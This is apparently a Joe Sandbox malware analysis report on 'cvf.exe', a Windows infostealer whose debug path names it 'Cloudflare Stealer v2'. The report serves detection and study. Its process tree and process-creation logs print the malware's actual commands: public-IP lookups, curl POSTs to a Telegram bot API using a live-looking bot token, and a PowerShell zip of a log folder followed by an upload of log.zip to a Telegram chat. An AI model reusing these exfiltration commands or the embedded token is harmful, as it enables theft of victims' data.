Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cvf.exe

Overview

General Information

Sample name:cvf.exe
Analysis ID:1636485
MD5:724d9557f66b00f2d74846e3e29434e6
SHA1:7edbf247b9cb9881c1888c4feaaee5fcb3af0254
SHA256:cc681954f48230c5a451104f96273baaab0d30d800732af5a1cf4e1eaf49d719
Tags:exestrangeuser-banthisg
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses nslookup.exe to query domains
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cvf.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\cvf.exe" MD5: 724D9557F66B00F2D74846E3E29434E6)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cvf.exe (PID: 7768 cmdline: cvf.exe MD5: 724D9557F66B00F2D74846E3E29434E6)
      • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • nslookup.exe (PID: 7800 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
        • findstr.exe (PID: 7808 cmdline: findstr Address MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • findstr.exe (PID: 7824 cmdline: findstr /V resolver1.opendns.com MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7848 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 7864 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 7940 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • nslookup.exe (PID: 8112 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
        • findstr.exe (PID: 8120 cmdline: findstr Address MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • findstr.exe (PID: 8136 cmdline: findstr /V resolver1.opendns.com MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 8176 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 1832 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 7732 cmdline: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 6864 cmdline: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 3876 cmdline: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, CommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: cvf.exe, ParentImage: C:\Users\user\Desktop\cvf.exe, ParentProcessId: 7768, ParentProcessName: cvf.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, ProcessId: 7848, ProcessName: cmd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", CommandLine: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", ProcessId: 7732, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-12T20:15:21.605870+010018100081Potentially Bad Traffic192.168.2.449742149.154.167.220443TCP
2025-03-12T20:15:24.769160+010018100081Potentially Bad Traffic192.168.2.449745149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-12T20:14:58.605223+010018100071Potentially Bad Traffic192.168.2.449723149.154.167.220443TCP
2025-03-12T20:15:02.180165+010018100071Potentially Bad Traffic192.168.2.449726149.154.167.220443TCP
2025-03-12T20:15:04.974956+010018100071Potentially Bad Traffic192.168.2.449731149.154.167.220443TCP
2025-03-12T20:15:08.056433+010018100071Potentially Bad Traffic192.168.2.449735149.154.167.220443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: cvf.exeVirustotal: Detection: 15%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: cvf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: cvf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb9 source: cvf.exe
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb source: cvf.exe
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BDE041 FindFirstFileExW,0_2_00BDE041
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BB22D0 Concurrency::cancel_current_task,FindFirstFileA,CopyFileA,FindNextFileA,CreateDirectoryA,GetLastError,FindClose,SHGetFolderPathA,0_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC77E6 FindClose,FindFirstFileExW,GetLastError,0_2_00BC77E6
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC783D GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_00BC783D

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49726 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49723 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49742 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49731 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49745 -> 149.154.167.220:443
Uses nslookup.exe to query domains
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.4:60707 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: resolver1.opendns.com
Source: global trafficDNS traffic detected: DNS query: 222.222.67.208.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: myip.opendns.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 399
Source: cvf.exeString found in binary or memory: https://api.telegram.org/bot
Source: curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH
Source: curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH%
Source: cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE
Source: curl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument
Source: curl.exe, 0000001E.00000002.1414619345.00000000029B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-47
Source: curl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-Fd
Source: curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, ConDrv.2.drString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage
Source: curl.exe, 00000008.00000002.1184435257.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003630000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1245625646.0000000003070000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage-HContent-Type
Source: curl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageF
Source: curl.exe, 00000013.00000003.1277931569.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.1277913522.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageapi.telegram.o
Source: cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragEath
Source: cvf.exeString found in binary or memory: https://api.telegram.org/botCaliforniaUnited
Source: cvf.exeString found in binary or memory: https://api.telegram.org/botExecuting
Source: cvf.exe, READ_ME.txt.2.drString found in binary or memory: https://t.me/fakecloudflare
Source: cvf.exeString found in binary or memory: https://t.me/fakecloudflareLog
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BB22D00_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BCF26E0_2_00BCF26E
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BE23E90_2_00BE23E9
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BD25700_2_00BD2570
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BB86800_2_00BB8680
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BB99A00_2_00BB99A0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BDB94D0_2_00BDB94D
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BE094D0_2_00BE094D
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BBAC800_2_00BBAC80
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BBCCC00_2_00BBCCC0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BCBDC00_2_00BCBDC0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC1E300_2_00BC1E30
Source: C:\Users\user\Desktop\cvf.exeCode function: String function: 00BC9500 appears 62 times
Source: C:\Users\user\Desktop\cvf.exeCode function: String function: 00BC41C0 appears 37 times
Source: cvf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal72.troj.evad.winEXE@47/13@9/2
Source: C:\Users\user\Desktop\cvf.exeFile created: C:\Users\user\Desktop\firstrun.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2f5tt03m.i5l.ps1Jump to behavior
Source: cvf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cvf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: cvf.exeVirustotal: Detection: 15%
Source: unknownProcess created: C:\Users\user\Desktop\cvf.exe "C:\Users\user\Desktop\cvf.exe"
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Users\user\Desktop\cvf.exe cvf.exe
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Users\user\Desktop\cvf.exe cvf.exeJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
